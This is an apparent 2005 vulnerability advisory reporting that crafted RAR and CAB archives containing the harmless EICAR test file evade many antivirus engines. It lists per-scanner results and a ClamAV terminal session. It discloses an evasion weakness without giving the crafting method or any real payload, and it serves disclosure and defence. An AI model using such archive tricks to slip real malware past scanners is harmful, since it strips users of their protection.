Release Date : 2005-10-05 Tested on: Windows 2000 SP2 & SP4 Tested with: Jotti Online Antivirus Scanner Tested with: VirusTotal Online Antivirus Scanner Tested with: Command line freeware UnRAR v3.50 Tested with: PowerZip v7.06 Discovered by: fRoGGz Credit to: SecuBox Labs -=====================================================================- Analysis __________ Specially crafted archive containing a virus will pass through the antivirus system without detection. An attacker can compress a malicious payload and evade detection by some anti-virus software. The bypassed malicious content does not pose a risk until extracted from the RAR archive file. Malicious content will be detected and eliminated by your Antivirus. Contrary to Winzip or BitZipper which do not authorize the opening of the file, Winrar & PowerZip open & extract it. -=====================================================================- Proof of Concept ________________ We have used: eicar.com EICAR test is a 68 bytes file "detect" as if it were a virus. For more information, visit: Ref: [ http://shadock.net/secubox/AVCraftedArchive.html ] Results for: SecuBox_AVPoC1.rar _______________________________ [?] AntiVir Found nothing [?] ArcaVir Found nothing [?] Avast Found nothing [!] AVG Antivirus Found EICAR_Test (+187) [!] BitDefender Found EICAR-Test-File (not a virus) [!] CAT-QuickHeal Found Eicar.Test [~] ClamAV Found nothing >> Suspect [?] Dr.Web Found nothing [?] eTrust-Iris Found nothing [?] eTrust-Vet Found nothing [!] Fortinet Found EICAR_TEST_FILE [?] F-Prot Antivirus Found nothing [!] Ikarus Found EICAR_Test [?] Kaspersky Antivirus Found nothing [?] McAfee Found nothing [?] NOD32 Found nothing [?] Norman Virus Control Found nothing [!] Panda Found Eicar.Mod [?] Sophos Found nothing [?] Symantec Found nothing [?] TheHacker Found nothing [?] UNA Found nothing [?] VBA32 Found nothing Results for: SecuBox_AVPoC2.rar ________________________________ [?] AntiVir Found nothing [!] ArcaVir Found Eicar.Test [!] Avast Found EICAR Test-NOT!! [!] AVG Antivirus Found EICAR_Test [?] BitDefender Found nothing [!] CAT-QuickHeal Found Eicar.Test [~] ClamAV Found nothing >> Suspect [?] Dr.Web Found nothing [?] eTrust-Iris Found nothing [?] eTrust-Vet Found nothing [?] Fortinet Found nothing [?] F-Prot Antivirus Found nothing [?] Fortinet Found nothing [!] Ikarus Found EICAR_Test [?] Kaspersky Antivirus Found nothing [?] McAfee Found nothing [?] NOD32 Found nothing [?] Norman Virus Control Found nothing [!] Panda Found Eicar.Mod [!] Sophos EICAR-AV-Test [?] Symantec Found nothing [?] TheHacker Found nothing [?] UNA Found nothing [?] VBA32 Found nothing Results for: SecuBox_AVPoC3.cab ________________________________ [?] AntiVir Found nothing [?] ArcaVir Found nothing [?] Avast Found nothing [!] AVG Antivirus Found EICAR_Test [?] BitDefender Found nothing [?] CAT-QuickHeal Found nothing [?] ClamAV Found nothing [?] Dr.Web Found nothing [?] eTrust-Iris Found nothing [?] eTrust-Vet Found nothing [?] Fortinet Found nothing [?] F-Prot Antivirus Found nothing [?] Fortinet Found nothing [?] Ikarus Found nothing [?] Kaspersky Antivirus Found nothing [?] McAfee Found nothing [?] NOD32 Found nothing [?] Norman Virus Control Found nothing [?] Panda Found nothing [?] Sophos Found nothing [?] Symantec Found nothing [?] TheHacker Found nothing [?] UNA Found nothing [!] VBA32 Found EICAR-Test-File Unix test with ClamAV _____________________ thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab SecuBox_AVPoC3.cab: OK thot:~$ cabextract SecuBox_AVPoC3.cab Extracting cabinet: SecuBox_AVPoC3.cab extracting EICAR.com All done, no errors. thot:~$ clamscan --no-summary EICAR.com EICAR.com: Eicar-Test-Signature FOUND thot:~$ thot:~$ clamscan -V ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005 -==================================================- CREDiTS --------------------- SecuBox Labs - fRoGGz Greet's fly out to: maew, Jordi Bosveld & VirusTotal
